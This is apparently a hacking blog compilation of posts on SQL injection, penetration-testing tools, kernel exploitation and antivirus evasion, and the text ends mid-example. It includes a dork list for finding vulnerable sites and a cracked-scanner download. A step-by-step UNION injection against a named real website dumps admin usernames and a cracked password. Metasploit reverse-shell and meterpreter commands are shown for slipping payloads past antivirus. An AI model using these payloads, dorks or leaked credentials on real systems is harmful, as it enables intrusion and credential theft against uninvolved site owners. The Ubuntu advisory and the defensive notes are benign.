Advanced SQL Injection - Defcon 17 - john Mccray

According to OWASP top 10 vulnerabilities of 2010, SQL injection is the most dangerous and most common vulnerability around, A SQL Injection vulnerability occurs due to improper input validation or no input validation at all, what I mean by improper or no input validation is the user input is not filtered(for escape characters) before it gets passed to the SQL database, A Sql injection attack can be any many forms, but it's usually categorized into 3 types:

1. Inband

2. Out of band

3. Inferential

n this presentation john Mccray discusses some of advanced SQL Injection methods and topics such as IDS evasion, filter bypassing etc.

BackTrack 5 R1 Released - Penetration Testing Distribution

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

Official BackTrack 5 R1 change log:

1. This release contains over 120 bug fixes, 30 new tools and 70 tool updates.
2. The kernel was updated to 2.6.39.4 and includes the relevant injection patches.

According to the guys at OffSec, This release is their best one yet! Some pesky issues such as rfkill in VMWare with rtl8187 issues have been fixed, which provides for a much more solid experience with BackTrack.We’ve have Gnome and KDE ISO images for 32 and 64 bit (no arm this release), as well as a VMWare image of a 32 bit Gnome install, with VMWare Tools pre-installed.
We are mighty excited and are already downloading this release just as we speak!
Download Backtrack 5 R1

Online SQLi Scanners

http://scanner.drie88.tk/
http://wolfscps.com/gscanner.php
http://cattuong.net/
http://www.sunmagazin.com/tools/hack/SQLI-Scan/
http://www.be007.gigfa.com/scanner/scanner.php
http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/

Regards
iMasterhack

Browser Based Hacking Framework - Mantra Security Toolkit 0.6.1 Released

Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

The software is intended to be lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.

Mantra can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensive security related tasks.


Project Goals

• Create an ecosystem for hackers based on browser
• To bring the attention of security people to the potential of a browser based security platform
• Provide easy to use and portable platform for demonstrating common web based attacks( read training )
• To associate with other security tools/products to make a better environment.

You can download Mantra 0.6.1 here:
Linux 32-bit – Mantra Security Toolkit – Gandiva.tar.bz2
Windows – OWASP Mantra Security Toolkit – Gandiva.exe
Or read more here.

WordPress Security/Vulnerability Scanner - WPScan

WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach (scanning without any prior knowledge of what has been installed etc).

Features

• Username enumeration (from author querystring and location header)
• Weak password cracking (multithreaded)
• Version enumeration (from generator meta tag)
• Vulnerability enumeration (based on version)
• Plugin enumeration (2220 most popular by default)
• Plugin vulnerability enumeration (based on version) (todo)
• Plugin enumeration list generation
• Other misc WordPress checks (theme name, dir listing, …)

Requirements

WPScan requires two non native Ruby gems, typhoeus and xml-simple. It should work on both Ruby 1.8.x and 1.9.x.

sudo apt-get install libcurl4-gnutls-dev
sudo gem install –user-install typhoeus
sudo gem install –user-install xml-simple

The full README is available here.

You can download WPScan by checking it out from the SVN repository on Google Code:

svn checkout http://wpscan.googlecode.com/svn/trunk/ wpscan-read-only

Or you can read more here.

xuhaid SQLi Scanner V3

xuhaid SQLi Scanner V3
--Status:[online]--


I HIGHLY recommend you to use this SQLi Scanner, and not .exe tools!
Side Note: Better dork = more results! Keep that in mind!

Ok In This Version We have 2 New Scanner's Public & Private ... And In this Version I have added Duplicate Link remover Soo that after scanning you guys can easily remove duplicate Links.

Private Online SQLi Scanner V1
*Click here to Access*

Public Online SQLi Scanner V1
*Click here to Access*

Private Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*

Public Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*

Ok Public Version Will Log Your Links Which you'll Scan In Our Scanner For Those who hate scanning websites For more info Check here : http://sqlscanner.info/Public-Sql-Scanne...index.html

Public Scanner Version 1 Logger here : http://sqlscanner.info/Public-Sql-Scanner/v1log.txt

Public Scanner Version 2 Logger here : http://sqlscanner.info/Public-Sql-Scanner/v2log.txt

After Scanning You can Now easily Remove Links with one Click From here : http://sqlscanner.info/Repeatremover.html

About Version 2 If you Guys Don,t know This will Scan Only Vulnerable Sites

Dork List :

Code:

inurl:php?=id+gov
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=

Quote:Use online sqli scanner (scan specific: websites/domains/countries)

Code:

www.sqlscanner.info

Quote:How to: Scan specific websites

Just use it like this:
inurl:php?id=+site:[domain of website]

you can either change it like:
inurl:php?page=+site:[domain of website]
inurl:php?type=+site:[domain of website]

If by any chance it fail's just put inurl or allinurl instead of site, like this:
inurl:php?id=+inurl:[domain of website]
inurl:php?id=+allinurl:[domain of website]

Examples:

If you want to scan specif countries websites:
for example .pt websites:
inurl:php?type=+site:.pt
or .br:
inurl:php?type=+site:.br

If you want to scan: http://www.thurrock.gov.uk
use: inurl:php?=id+site:thurrock.gov.uk

If You Face Any Kind of Problem Comment Here
Regards
iMasterhack

Acunetix Ver 7.0 Cracked Working and UPDATEABLE

Tested in : Windows xp desktop Pc and windows 7 Ultimate Laptop and its working and UPDATEABLE!! .. 

But  only use in Vmware because i am not 100 % sure if it is clean ... 

Thanks...

Download Info 

Code:

http://www.multiupload.com/EECTPQMDUH

[Video tut]Sqli injection Details Tutorial [Noob Friendly]

Presents Sqli Injection Fully Detailed Video Tutorial In High Quality Fully Detailed [Noob Friendly]

By Mr.Mind fReak


Download

http://www.filesonic.com/file/1191283394

BT4 Assuring Security by Penetration Testing

If you are working in the “information security” field, you must know the BackTrack distribution (otherwise you must be an alien coming from a far away planet!). If you search for the word “backtrack” on Amazon, you will find lot of references but only one book is fully dedicated to the Linux distribution: “BackTrack 4: Assuring Security by Penetration Testing“. I received a copy directly from the publisher and here is my review.

Just for those who are not familiar with BackTrack, it’s a Linux distribution made by security professionals for security professionals: It contains hundreds of tools to perform security assessments and penetration tests. Some of them are well-known like Metasploit, WebScarab or sqlmap and others are real gems (example: ua-tester which was added recently) and  increase the quality of the toolbox version after version.

Even if BackTrack 5 was released a few weeks ago, it does not reduce the book quality. There are so many tools that a single volume is not enough to cover all of them.The following chapters covered the classic penetration testing schema:

• Target scoping
• Information gathering
• Target discovery
• Enumerating target
• Vulnerability mapping
• Social engineering
• Target exploitation
• Privilege escalation
• Maintaining access
• Documentation and reporting

Each chapter reviews the most interesting tools (according to the authors) to achieve the chapter topic. Tools are briefly explained with examples. Straight to the point!
So, who’s need this book? The author’s goal is certainly not to give recipes on “how to hack a website“. The book must been see as a reference for those who already know the BackTrack distribution or who want to learn it. Don’t forget: this is just a toolbox, it does not prevent you to use your brain!
More information about the book here.

SQL injection Hack tool for hacking websites and database

Introduction:

Safe3SI is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting

SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the

ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database,

to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Screenshot:

Features:

• Full support for http, https website.
• Full support for Basic, Digest, NTLM http authentications.
• Full support for GET, Post, Cookie sql injection.
• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
• Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
• Powerful AI engine to automatic recognite injection type, database type, sql injection best way.
• Support to enumerate databases, tables, columns and data.
• Support to read,list and write any file from the database server underlying file system when the database software is MySQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server.
• Support to ip domain query,web path guess,md5 crack etc.
• Support for sql injection scan.

Download:

Safe3SI need to download and install:

• .NET Framework 2.0 or above needed to install

• Safe3SI v8.2

SQL Injection tutorial to Hack websites | Hacking websites

we have already discussed about SQL Injections method of hacking websites . Some of my website users reported that those articles are little bit difficult to understand for new users who wish to learn hacking. For the sake of new users who wish to learn website hacking and SQL injection, i am writing this article  at such a basic level that the user who didn't even have any prior knowledge of SQL can start SQL Injecting websites. This article is also beneficial for hackers too as it will refresh their concepts that what really we have to do and look into website URL if we want to hack website or its database using SQL injection. So Guys read on very basic SQL injection tutorial...

SQL injection tutorial to hack websites | Hacking website databse

What is SQL Injection?

Basically SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its basically the coding standard loop hole. Most website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. For better understanding, suppose you opened a website and went to his Sign in or log in page. Now in username field you have entered something say Adnan and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL.

Requirements for SQL Injection:

1. You need a web browser to open URL and viewing source codes.

2. Need a good editor like Notepad ++ to view the source codes in colored format so that you can easily distinguish between the things.

3. And very basic knowledge of some SQL queries like SELECT, INSERT, UPDATE, DELETE etc..

What you should look into website to detect is it vulnerable to SQL injection attack or not?

First of all you can hack those websites using SQL injection hacks that allows some input fields from which can provide input to website like log in page, search page, feedback page etc. Nowadays, HTML pages use POST command to send parameters to another ASP/ASPX page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

 < F O R M action=login. aspx method=post>
< i n p u t type=hidden name=user v a l u e=xyz>
< / F O R M>

Everything between the < f o r m >  and < / f o r m > parameters (remove spaces in words) contains the crucial information and can help us to determine things in more detailed way.

There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:

http://example.com/login.asp?id=10

Now how to detect that this URL is vulnerable or not:

Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:

http://example.com/login.asp?id=hi' or 1=1--

 You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:

< F O R M action=http://example.com/login. asp method=p o s t >
< i n p u t  type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

 

 If your luck is favoring you, you will get the login into the website without any username or password.

But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:

http://example.com/search.asp?category=sports

In this URL 'category' is the variable name and 'sports' is it's value.

Here this request fires following query on the database in background.

SELECT * FROM TABLE-NAME WHERE category='sports'

Where 'TABLE-NAME' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:

http://example.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like:
SELECT * FROM search WHERE category='sports' or 1=1--'
 

The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

 
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

How to protect you own websites from SQL injection?

 
Filter out character like   '    "    -    /    \    ;    NULL, etc. in all strings from:
* Input from users
* Parameters from URL
* Values from cookie

That's all for today, 

I hope it really helped you to clear your basics about website hacking or website database hacking using SQL injection.

If you have any queries ask me in form of comments...

SQL Injection | Step by Step deface website

What is SQL injection ?
SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the user's input is not filtered or
improperly filtered.Example the webpages links in format
www.anything.com/something.php?something=something, example
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end (') that is
www.tartanarmy.com/news/news.php?id=130'
and we got an error on the screen because it included the single quote (') while processing the results. It assures us that it didn't filter our input and is vulnerable to attack.

Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.



 


We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose 'admin' table, it has columns id,username,password,email.

 What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases.

We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.





SQL Injection Tutorial :- 
 This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.

Step1.Find number of columns.
Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number,
say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on '6'
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
we didn't get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.

Step 3. Find database version.
Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from 
 information_schema.tables where table_schema=database()-- Click here
We got first table name on the screen.

To get all tables use group_concat

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()-- Click here

Step 5.Finding column names.
Simlary get all the columns by simply replacing 'table' with 'column'
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from
information_schema.columns where table_schema=database()-- Click here
There is a repeating element like in this case is 'id' .From it, we come to know which table number
has which columns.

Step 6.Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result  to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got 'oorwullie' in result ( password in clear text).

Note:Hashes are type of encryptions which are irreversible.  There are numberless online crackers  available. Keep trying. Sometimes very strong hashes can not be cracked. 
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.



So You came to know that how deadly it could be to allow users to send their input without any filteration/validation. So never be lazy at programming and use possible filteration mechanisms. 

Kindly mention your queries in comments. The same thing we did can be done easily using automated tools.I will write that in next post. But avoid tools,if you really want to learn new.

Download BackTrack 5

How to download BackTrack 5

Download BackTrack 5 directly

Download BackTrack 5 from Mirror - Download BackTrack 5 Torrent

Name:     BT5-KDE-32.torrent
   
Size:           1840
   
Flavor:        KDE
   
Arch:          32 bit
   
Image:       ISO
   
Download BackTrack 5 KDE-32Bit  From Here  :     Torrent
   
MD5:     4150643026d292717f77ebb83948a034
     
=================

Name:     BT5-KDE-64.torrent
   
Size:            1800
   
Flavor:         KDE
   
Arch:           64 bit
   
Image:         ISO
   
Download BackTrack 5 KDE-64Bit From here :     Torrent
   
MD5:     80d65610de90ac7ede49b9f7935dfdd2
     
==================


Name:     BT5-GNOME-32.torrent
   
Size:                  1910
   
Flavor:              GNOME
   
Arch:                 32 bit
   
Image:               ISO
   
Download BackTrack 5 Gnome-32Bit From Here :       Torrent
   
MD5:                 b01a93a916fabb6d1640bd0054428e17

============================================

Name:              BT5-GNOME-64.torrent
   
Size:                1870
   
Flavor:            GNOME
   
Arch:               64 bit
   
Image:             ISO
   
Download BackTrack 5 Gnome-64Bit From Here:     Torrent
   
MD5:                75c4e7a969abc873d9e085656b156345

Your Way to grsec/PaX Bypass-stackjacking

Technique to exploit grsecurity/PaX-hardened Linux kernels.  Read on for a brief overview of our presentation and a link to the full slides and PoC code.
By (Dan Rosenberg and jon oberheide)

The Stackjacking Technique

In our slides, we presented a technique to exploit a grsecurity/PaX-hardened Linux kernel (eg. GRKERNSEC_HIGH) given the existence of two exploitation primitives:

• an arbitrary kernel write; and
• a kernel stack memory disclosure

To be clear, this attack vector is completely unnecessary when exploiting a vanilla Linux kernel, since an arbitrary write is more than sufficient to get root, given the vast amount of useful targeting information Linux gives out via /proc, etc. Likewise, the kernel stack memory disclosure is also unnecessary on vanilla, since there are much easier ways of getting this information. However, due to GRKERNSEC_HIDESYM (which aims to remove all known sources of info leakage), PAX_KERNEXEC (which makes global data structures with known locations read-only), and other mitigation features of grsecurity/PaX, effective exploitation is orders of magnitude harder than a vanilla kernel and took a few interesting twists.
Our technique can be broken down into three distinct stages:

• Stack self-discovery: We observed that kernel stack memory disclosures can leak sensitive addresses to userspace.  In particular, if we can leak a pointer TO the kernel stack that resides ON the kernel stack, we can calculate the base of our own process’ kernel stack: kstack_base = leaked_addr & ~(THREAD_SIZE-1).  We call this technique stack self-discovery.
• Stack groping: If our end goal is to read the address of our process’ cred structure and use our write to modify it and escalate privileges, we need to turn our kleak+kwrite into an arbitrary read.  We discovered two such techniques to do this: (1) the Rosengrope technique that modifies addr_limit in thread_info metadata stored at the base of the kstack to allow arbitrary reads from kernel space to userspace; and (2) the Obergrope technique that manipulates saved registers within a kernel stack frame that are later popped and used as the source address for copy_to_user()/put_user() operations.
• Stack jacking: After constructing our arbitrary read from a kleak+kwrite, we read the task_struct address out of thread_info at the base of the kstack and then read the cred struct address out of task_struct. Armed with the address of our process’ credential structure and an arbitrary write, we modified our uids/gids/caps to escalate privileges.

For the full details, please see the presentation materials and PoC code:

• Infiltrate 2011 [PDF]
• Hackito Ergo Sum 2011 [PDF]
• PoC Code [GITHUB]

The Response

If you haven’t yet read spender’s response to our presentation, I recommend doing so.  While I’ll refrain from commenting on the political aspects of his post, I’ll happily comment on the technical aspects.  The fixes that spender and pipacs have released have mitigated the particular exploit vectors we used to perform the stack groping stage of our attack against the grsec/PaX kernel:

• The thread_info struct has been moved out from the base of the kernel stack preventing the Rosengrope technique from being able to write KERNEL_DS into the addr_limit member.
• The RANDKSTACK feature, now available on both i386 and amd64, frustrates the Obergrope technique as the randomization of the kernel stack pointer on each system call makes writing into a particular offset in the stack frame unreliable.

Props to spender and pipacs for cranking out those fixes as well as a number of other enhancements.  While the latest grsecurity patch effectively prevents the current vectors we discovered and presented in our talks at HES and Infiltrate, there are several loose ends I need to investigate to ensure the fixes address other potential exploitation vectors.
More on that later…

DHCP vulnerability in some Ubuntu releases

Ubuntu Security Notice USN-1108-2
April 19, 2011

dhcp3 vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 9.10

Summary:

An attacker's DHCP server could send crafted responses to your computer and
cause it to run programs as root.

Software Description:
- dhcp3: DHCP Client 

Details:

USN-1108-1 fixed vulnerabilities in DHCP. Due to an error, the patch to fix
the vulnerability was not properly applied on Ubuntu 9.10 and higher. This
update fixes the problem.

Original advisory details:

 Sebastian Krahmer discovered that the dhclient utility incorrectly filtered
 crafted responses. An attacker could use this flaw with a malicious DHCP
 server to execute arbitrary code, resulting in root privilege escalation.

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 10.10:
  dhcp3-client                    3.1.3-2ubuntu6.2

Ubuntu 10.04 LTS:
  dhcp3-client                    3.1.3-2ubuntu3.2

Ubuntu 9.10:
  dhcp3-client                    3.1.2-1ubuntu7.3

In general, a standard system update will make all the necessary changes.

References:
  CVE-2011-0997

Package Information:
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.3-2ubuntu6.2
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.3-2ubuntu3.2
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.2-1ubuntu7.3

Bypass Antivirus Protection And Execute Metasploit Payloads

Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Protection!
Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit and your execute from memory meterpreter script fails you. The antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script to execute in memory a sequence of opcodes. Its current features include:

• Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
• Can be compiled and works on 32-bit and 64-bit architectures.
• As far as I know, no AV detect it as malicious.
• Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
• It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
• Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.

How to use shellcodeexec?
The author presents perfect examples to run the tool. We have listed them as under:
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:

1	$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

Or for a Windows target:

1	$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target:

1	$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

Or for a Windows target:

1	$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target:

1	$ ./shellcodeexec

Or, on the Windows target:

1	C:WINDOWSTemp>shellcodeexec.exe

Download shellcodeexec (inquisb-shellcodeexec.zip) here.

2nd:

Background

Most of the shellcode launchers out there, including proof of concepts part of many security books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems.

Description

This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems.

Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line:

$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe

This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot.

I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor.

So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play!

Features

shellcodeexec:

• Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
• Can be compiled and works on 32-bit and 64-bit architectures.
• As far as I know, no AV detect it as malicious.
• Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable.
• It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
• Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.

Example

1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Windows target:

